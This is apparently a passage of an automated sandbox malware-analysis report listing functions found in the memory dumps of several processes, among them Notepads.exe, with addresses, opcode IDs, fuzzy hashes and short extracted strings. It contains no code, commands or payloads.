                                              • Source File: 00000007.00000002.374707651.0000000002EB0000.00000040.00000040.sdmp, Offset: 02EB0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ab47f7bc1c6b862c10a20b32a7c8008c12089defa7e39d3e8132f414d64c7e0
                                              • Instruction ID: b77a542e9de936d965d07f58908cf2e31f9a78a23236be6dea695c7f1b59fffa
                                              • Opcode Fuzzy Hash: 1ab47f7bc1c6b862c10a20b32a7c8008c12089defa7e39d3e8132f414d64c7e0
                                              • Instruction Fuzzy Hash: 08E092766406009BD650CF0BEC81462F7D8EB88630B18C47FDC0D8B700E575B504CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0543016F, Relevance: .0, Instructions: 18COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f38e64ddfe5861f0237d573769b7dbc521de2ca423dacea3a77cee9763dd68f
                                              • Instruction ID: 109f3dfa31d7c5d0954c45287d1bacc37cfd5e03c44bf5e802d37110a004e38b
                                              • Opcode Fuzzy Hash: 6f38e64ddfe5861f0237d573769b7dbc521de2ca423dacea3a77cee9763dd68f
                                              • Instruction Fuzzy Hash: 5DE0C231A41384CFC7152734A41942837A99F872127040EB9E4228B7C1DA3ACC99CA41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05432D20, Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ededde0e6506843ae51fe4da610a3ab9c0e2484d9721e4affa1a1d94b521744
                                              • Instruction ID: 568625c2271f462fa02d76bcc53e37997e05f2937e404b47690b669aadc41104
                                              • Opcode Fuzzy Hash: 6ededde0e6506843ae51fe4da610a3ab9c0e2484d9721e4affa1a1d94b521744
                                              • Instruction Fuzzy Hash: AAD0A97D48CA48E6E3618150AC5BBF93B058B1D302FA64843A60A080F6E8C480268406
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 054302A1, Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 336fd431e89b7fc760a6d16cc7f3076eeec2f08edbeef38762c4ee694d49f05e
                                              • Instruction ID: 3771d6b30defd6e51c56b8095b996238ba7f71c37f7308905ed81d5060ebeffb
                                              • Opcode Fuzzy Hash: 336fd431e89b7fc760a6d16cc7f3076eeec2f08edbeef38762c4ee694d49f05e
                                              • Instruction Fuzzy Hash: BDD05E35504624C7C364DA28E886AC677AAFB98210B14CE1EE89A96718CB60FC068790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05430650, Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6b8d461e8f0fd8e074f4691739192e37b1e3386ef6edd0cbbdca76c969d4abc
                                              • Instruction ID: d4aae3e23c4a9f7e426524cfaa470565b45f6d857ea3fb32ad48c2a3cc68e22f
                                              • Opcode Fuzzy Hash: e6b8d461e8f0fd8e074f4691739192e37b1e3386ef6edd0cbbdca76c969d4abc
                                              • Instruction Fuzzy Hash: FCD0227384131A8BD7244131A82F7E17305D7A8208F008833D4004C324E832A853AC11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D123F4, Relevance: .0, Instructions: 15COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374601961.0000000002D12000.00000040.00000001.sdmp, Offset: 02D12000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a94dc68840aaa654f8787a2a63fca1655923af736be35338a01c7cfdb6412bb
                                              • Instruction ID: bb4ba2ad8340038e34794ddd2a2d968621191ebed45c32f2c659d823af366a83
                                              • Opcode Fuzzy Hash: 9a94dc68840aaa654f8787a2a63fca1655923af736be35338a01c7cfdb6412bb
                                              • Instruction Fuzzy Hash: DFD05EB9215A919FD3268A1CD1AAB953BD4AB61B08F4644FDEC008BB63C369E981D200
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D123BC, Relevance: .0, Instructions: 14COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374601961.0000000002D12000.00000040.00000001.sdmp, Offset: 02D12000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffed06ba4d48d2768789ec64ceed4611ddf904e511acbf5fc3e4ecd77d776dab
                                              • Instruction ID: e33a9c215ff5b9fdf3d9170acf2a86bd0b7a16846f85d77884f5536e0990580c
                                              • Opcode Fuzzy Hash: ffed06ba4d48d2768789ec64ceed4611ddf904e511acbf5fc3e4ecd77d776dab
                                              • Instruction Fuzzy Hash: 45D05E342402818FC715DB0CD598F5937D4AB41B04F0644ECBC408BB62C3A6DC81D600
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05430180, Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c35ce8bbf2826f828c3e022504ac1049e499c5d88a286c79804c2c1d97c7db7
                                              • Instruction ID: ea85370eb283ed71e7bac3096562acff5e1bb401e3e6e42a1e6dd198f5143ac5
                                              • Opcode Fuzzy Hash: 6c35ce8bbf2826f828c3e022504ac1049e499c5d88a286c79804c2c1d97c7db7
                                              • Instruction Fuzzy Hash: 21D0CA30640344CBCB282B74A01942833AAAB8820A70108BCE8068A741EE3BECA0CA80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05432EC0, Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd07eaa00ed856e3322dec99faafc8fad05fff56b9c784e04198c08129f672ca
                                              • Instruction ID: 00f098b75d91a3bcc59d5adc8b47b162e436469f72e4ffaf4a7aa1c174414b77
                                              • Opcode Fuzzy Hash: cd07eaa00ed856e3322dec99faafc8fad05fff56b9c784e04198c08129f672ca
                                              • Instruction Fuzzy Hash: 14B092352982080BEB6097B6784ABA6338CA780A19F5404A2B80CC5A40E586E8E42140
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05430660, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c1c582ae7afa7aa781b7abb1e4ab4420016ddc5e7e825925951a26753a5a9f2
                                              • Instruction ID: 07a331b345c8038e416a02a0bf57ab342167dffd86d2bb410a06e2ea111116a6
                                              • Opcode Fuzzy Hash: 8c1c582ae7afa7aa781b7abb1e4ab4420016ddc5e7e825925951a26753a5a9f2
                                              • Instruction Fuzzy Hash: 3BC02B30486318CFD3249672180E5B5B30A5AD4304300C83384050113889335863CC21
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 05430D93, Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ,:ar$0`r$:@:r$X1ar
                                              • API String ID: 0-2614842347
                                              • Opcode ID: 22f35b2a93810d19ffac519de8363791a358375db8897cf4f57f75792b18b08b
                                              • Instruction ID: 2d2a063c05cf8c0f2cb4466520a0f92d70beed3f50ea7ab59464bdba0f24dd75
                                              • Opcode Fuzzy Hash: 22f35b2a93810d19ffac519de8363791a358375db8897cf4f57f75792b18b08b
                                              • Instruction Fuzzy Hash: 83B19570A08344CFD3A4DF789164B6ABBE2FB98704F20496DE5498B395DFB69C45CB02
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: Notepads.exe PID: 5444 Parent PID: 6592 Notepads.exeCOMMON

                                              Executed Functions

                                              Function 00007FFD033302B8, Relevance: 5.3, Strings: 4, Instructions: 323COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: 9bc1dc82299b681bf13671e65fe2b71afa88e9bf587dec1c3b8b97eee9a3b8f9
                                              • Instruction ID: 74086da6c761fe4cad81196f35ffafc50d7390343da5e1fad06bb6ec2e508ba6
                                              • Opcode Fuzzy Hash: 9bc1dc82299b681bf13671e65fe2b71afa88e9bf587dec1c3b8b97eee9a3b8f9
                                              • Instruction Fuzzy Hash: 71917121B18D0E8FEB9CF76C84A57B9B7E2EF98711F444179D04EE3296DE286C428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330BD5, Relevance: 5.3, Strings: 4, Instructions: 309COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: 96d919fe659827a3a7d342dbfdbff4d74810a8779ad5a9584c1c2619a0faee92
                                              • Instruction ID: e97201a4da63f25cca911091edba07e0af95291ed8c1bb5b6aff916ab5d04e7e
                                              • Opcode Fuzzy Hash: 96d919fe659827a3a7d342dbfdbff4d74810a8779ad5a9584c1c2619a0faee92
                                              • Instruction Fuzzy Hash: B8919321B18D4D4FEB9CE76C84A57B9B7E2EF99311F04417AD04EE3297DE28AC428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330190, Relevance: 3.0, Strings: 2, Instructions: 521COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$p,o`
                                              • API String ID: 0-1596825762
                                              • Opcode ID: 017d6946b2abeef3c9ea50e4f425d0a02fdeb42ffc5a0c32d02cee0d0de3df46
                                              • Instruction ID: beaf0c2de909de973839f7d17984864f95d08bc9d2b039f5ccc3925e7d96d55d
                                              • Opcode Fuzzy Hash: 017d6946b2abeef3c9ea50e4f425d0a02fdeb42ffc5a0c32d02cee0d0de3df46
                                              • Instruction Fuzzy Hash: 65F1C531F199198FEB98FB2880A56B973D2FF99311F544179E04ED72D7DE28AC428780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033300F8, Relevance: 1.9, Strings: 1, Instructions: 611COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a
                                              • API String ID: 0-1490339538
                                              • Opcode ID: 1ccbe739cfc6dcabb9a706c2269cf9b146eae11eb1c635e6affe388fad412d2c
                                              • Instruction ID: ea0a677ce6bc49fa82dbaf2dba017b807f1f853080bfe894b0d3ed01312388f6
                                              • Opcode Fuzzy Hash: 1ccbe739cfc6dcabb9a706c2269cf9b146eae11eb1c635e6affe388fad412d2c
                                              • Instruction Fuzzy Hash: 5502E421F189198BEB58FB2C80B56F973D2FF99311B14417AD04ED72D7DE28A8428780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03331899, Relevance: 1.8, Strings: 1, Instructions: 540COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a
                                              • API String ID: 0-1490339538
                                              • Opcode ID: 0ec1a59e07dabd3eb7d99e98fee6af67e05371f5fe64676319c76e81781887fd
                                              • Instruction ID: 46cd438894701bc511ea8a9dc82128ca5b489210bea2b4758c1bb9f772720e22
                                              • Opcode Fuzzy Hash: 0ec1a59e07dabd3eb7d99e98fee6af67e05371f5fe64676319c76e81781887fd
                                              • Instruction Fuzzy Hash: 67F1E821F1D9198FEB98FB2880B56B973D2FF99311B5441B9D04ED72D7DE28AC428381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330929, Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a
                                              • API String ID: 0-1490339538
                                              • Opcode ID: 4007fceffff373e2e55b16f445bf0197f090243650c80b1b337b51afcd55657f
                                              • Instruction ID: ec3fa2004a63d02753ad7dbeaf28284df09df75ed2ee756b9905719aa6b96be2
                                              • Opcode Fuzzy Hash: 4007fceffff373e2e55b16f445bf0197f090243650c80b1b337b51afcd55657f
                                              • Instruction Fuzzy Hash: 4951E822B1CE4A8FEB49E76894663F9B7E1FF95710F044179E04ED31E3DE28A8458381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033306D5, Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: j`
                                              • API String ID: 0-3204994738
                                              • Opcode ID: cf03f91166f0fb7764a09aaf60ef5eda0f43579d72de00d8e060028fa6c2c034
                                              • Instruction ID: b4ff3dde0baa210740ccab68bf9d08f5c3264ea6ba61e9e600380e809ff40c5e
                                              • Opcode Fuzzy Hash: cf03f91166f0fb7764a09aaf60ef5eda0f43579d72de00d8e060028fa6c2c034
                                              • Instruction Fuzzy Hash: D3510F30B19929CFDA88F77880E55A973E2FF99305B9044B5E00ED7697DE38E84197C4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330195, Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: @__^
                                              • API String ID: 0-1816187844
                                              • Opcode ID: e25adb4a136a8cb261707f1c547cd373669a749b34832f15c95e7a7d57b11c63
                                              • Instruction ID: e21b51ea03aa40dcb444b9a43ebce2e27d4269fe155ccd5f3f8d2caf33d47391
                                              • Opcode Fuzzy Hash: e25adb4a136a8cb261707f1c547cd373669a749b34832f15c95e7a7d57b11c63
                                              • Instruction Fuzzy Hash: D441B217B5E9924BEA55F33E74B60ED3B90CF9533670800B7D0CCCA0A3DD48689A8B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD0333122D, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ]r_H
                                              • API String ID: 0-175258724
                                              • Opcode ID: e4552746640b66024388beacac21a8f8f1c163a189bce6cf34fa1ee1789e978e
                                              • Instruction ID: f5d9e9eed6271ca60aea8378478f0d2b28f2a38b9e3f6452854542bce9123caa
                                              • Opcode Fuzzy Hash: e4552746640b66024388beacac21a8f8f1c163a189bce6cf34fa1ee1789e978e
                                              • Instruction Fuzzy Hash: 0831F631E59A599FDB54FB2498A68F977F1FF85300B4040B6E40CD72A7CE38AA42C781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033312F9, Relevance: .4, Instructions: 395COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bc81a43ddef46d114fca730cc1a295382642c2f52447e5eb53eae7a82639266
                                              • Instruction ID: 37ddd064a8b63620ff78390f6021fb2102416dc79ecd457ee0807edd4152c040
                                              • Opcode Fuzzy Hash: 2bc81a43ddef46d114fca730cc1a295382642c2f52447e5eb53eae7a82639266
                                              • Instruction Fuzzy Hash: E7C15421F29D198FEB98F76884A56BDB7E2EF98701F444079D40ED3297DD28AC418741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033302F0, Relevance: .3, Instructions: 319COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d15874d5abe48d405bd735160c292814b53e0561290f5ccab53888f381db0a8c
                                              • Instruction ID: 0ea352206060ef4a99a3468c738599d1356b9642d7b1921a5313fc78449fd861
                                              • Opcode Fuzzy Hash: d15874d5abe48d405bd735160c292814b53e0561290f5ccab53888f381db0a8c
                                              • Instruction Fuzzy Hash: 7841E221B5E96D8FD694F76D80F55E877A1EFCA21278000B3E04DC33A7DC1CA846A799
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03331361, Relevance: .3, Instructions: 306COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 664b6367d63ff9d9fec2c21a557d5406fdde00a9a172b44da133a68c30f014e1
                                              • Instruction ID: 4acd84ed238c380eafa202886be7337da00d8e15f0364c87c7f26f1d54c8fb8a
                                              • Opcode Fuzzy Hash: 664b6367d63ff9d9fec2c21a557d5406fdde00a9a172b44da133a68c30f014e1
                                              • Instruction Fuzzy Hash: B6A14031F19D198FEB98FB68C4A56BD77E2EF98701F444079E40ED3297DE2868428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033302C0, Relevance: .1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c61a0c6d5ac38708b7138e6287db75f9fb31d8c866e1e4822add31b0bb009d5
                                              • Instruction ID: cab37385c2bfff8eeaad047d7c2f3b88e620bc5153eb2781af572345d850b143
                                              • Opcode Fuzzy Hash: 9c61a0c6d5ac38708b7138e6287db75f9fb31d8c866e1e4822add31b0bb009d5
                                              • Instruction Fuzzy Hash: C9419030F1894D8FDB88FF6884A4AE9B7E1FF58305F5085B6E00DD7256DA38E9418B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033309B9, Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ff30aac83670ecdea8b0111d383305a839ea5fcff0bd0d72966fca9cabd6f35
                                              • Instruction ID: eb52df5bb9023e5914fc8dd831686ca21e5aa755dce828858b2d92c8eec83f99
                                              • Opcode Fuzzy Hash: 9ff30aac83670ecdea8b0111d383305a839ea5fcff0bd0d72966fca9cabd6f35
                                              • Instruction Fuzzy Hash: F231F721B1DB498FE75CF72894A67B977D0EF95311F04417AE04ED31A3DD28A8058296
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330210, Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e43ca2eca67d8a4623e7b8f1ce37e6456042016259552b9d26fd685b8a817417
                                              • Instruction ID: 5e4bb9554a40a6fc554d3753d557c4a559c0ad4d62b085c65333c1c1cc6c6c9f
                                              • Opcode Fuzzy Hash: e43ca2eca67d8a4623e7b8f1ce37e6456042016259552b9d26fd685b8a817417
                                              • Instruction Fuzzy Hash: 0831C317B1E8954BEA54F32E64B55FD3B90DFD523670400B7E08CCA0A7DD08589B8791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330248, Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8c548ebbb4e3a8bd1fbdff2fa9a1cfb596c1f8b6c71a1d77a8eaf84e5ea11c3
                                              • Instruction ID: 26bc18307a6e67b3c6db46d195d13a415bad8abfb72a17f15c2736bffbb8162a
                                              • Opcode Fuzzy Hash: e8c548ebbb4e3a8bd1fbdff2fa9a1cfb596c1f8b6c71a1d77a8eaf84e5ea11c3
                                              • Instruction Fuzzy Hash: 74119316B1E8654BEA54F22E74E55F93B90CFD533670401B7E08CC61A3DD08589B8B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033305D5, Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7979c0089985b21a5309a5a8e448dbf6d1a7fe76d9212df9553570b4491425b4
                                              • Instruction ID: 2321d35fa301ee6f9b277e3bea60d4d55491ee50a93f31e958e044370c5c884d
                                              • Opcode Fuzzy Hash: 7979c0089985b21a5309a5a8e448dbf6d1a7fe76d9212df9553570b4491425b4
                                              • Instruction Fuzzy Hash: A1218E14F4DA1786FB9DB3B490F22B92689AF80701F4040B9E44FF61EBDD1CF8059662
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330B59, Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bca5f295915109f0de281616101017f54b2c1e7d170b5bc0197242c2592fbd4a
                                              • Instruction ID: 5f55660819d16f4625bc3941a2c2228a99f9b03a7b3ffb41c617bcbd05e957a4
                                              • Opcode Fuzzy Hash: bca5f295915109f0de281616101017f54b2c1e7d170b5bc0197242c2592fbd4a
                                              • Instruction Fuzzy Hash: 3511C22070DAC94FE78AF33C54A8AB53FD1AB9A225B0941E6E08DCB0B3C9588845C342
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330298, Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b04a7dd9b3755de0b1520d2b28211cd50f546d48eb3f7adb08c5829defcd2f2
                                              • Instruction ID: 942d2398b566fbd3672ba8b625d697db0e660281e0096e955563f013385533f0
                                              • Opcode Fuzzy Hash: 0b04a7dd9b3755de0b1520d2b28211cd50f546d48eb3f7adb08c5829defcd2f2
                                              • Instruction Fuzzy Hash: 50F0B421B19C198FEB94F22D50F9AF937D5DFAC2257100177E44DC32A3DD189C868781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033302B0, Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.604021614.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d6c9eb8cd2b4c5cd3c222d9150092e4ab9c317bd515d71d7a2ea65023309c6e
                                              • Instruction ID: a461443b039f7b64bc18d898b9bf010d8aca8f66ad48c9d5ec470207e8ebccb2
                                              • Opcode Fuzzy Hash: 1d6c9eb8cd2b4c5cd3c222d9150092e4ab9c317bd515d71d7a2ea65023309c6e
                                              • Instruction Fuzzy Hash: 40D05E10B14D094A63DCF23900ADB7A44C9CBA8605B104175A40ED22A7DC1858018240
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: Notepads.exe PID: 2152 Parent PID: 936 Notepads.exeCOMMON

                                              Executed Functions

                                              Function 00007FFD033302B8, Relevance: 5.3, Strings: 4, Instructions: 323COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: af652129ea316201bb43f8e5bd43b49f88181f44b51a2c173b6f72b5ed172121
                                              • Instruction ID: 74086da6c761fe4cad81196f35ffafc50d7390343da5e1fad06bb6ec2e508ba6
                                              • Opcode Fuzzy Hash: af652129ea316201bb43f8e5bd43b49f88181f44b51a2c173b6f72b5ed172121
                                              • Instruction Fuzzy Hash: 71917121B18D0E8FEB9CF76C84A57B9B7E2EF98711F444179D04EE3296DE286C428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330BD5, Relevance: 5.3, Strings: 4, Instructions: 309COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: 95359dee30ec74f0d3b8c07577c3e3e03c01c5f4ecd12f6ebb5d790c52f14a76
                                              • Instruction ID: e97201a4da63f25cca911091edba07e0af95291ed8c1bb5b6aff916ab5d04e7e
                                              • Opcode Fuzzy Hash: 95359dee30ec74f0d3b8c07577c3e3e03c01c5f4ecd12f6ebb5d790c52f14a76
                                              • Instruction Fuzzy Hash: B8919321B18D4D4FEB9CE76C84A57B9B7E2EF99311F04417AD04EE3297DE28AC428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330090, Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: A__^
                                              • API String ID: 0-3573331105
                                              • Opcode ID: 2d8e824c058f3f31d377dd1365f9410b9b58073c24deb017511501730e4edd24
                                              • Instruction ID: e0f1b7c17e39fa903e6630a96d8c2711081624e2337ca4b2701e30ba08f2409b
                                              • Opcode Fuzzy Hash: 2d8e824c058f3f31d377dd1365f9410b9b58073c24deb017511501730e4edd24
                                              • Instruction Fuzzy Hash: 24713417B5E5A25AEE15F27E74B60E93BA0CFC133670410B7D1CC890A3DD4868DF8A95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330929, Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
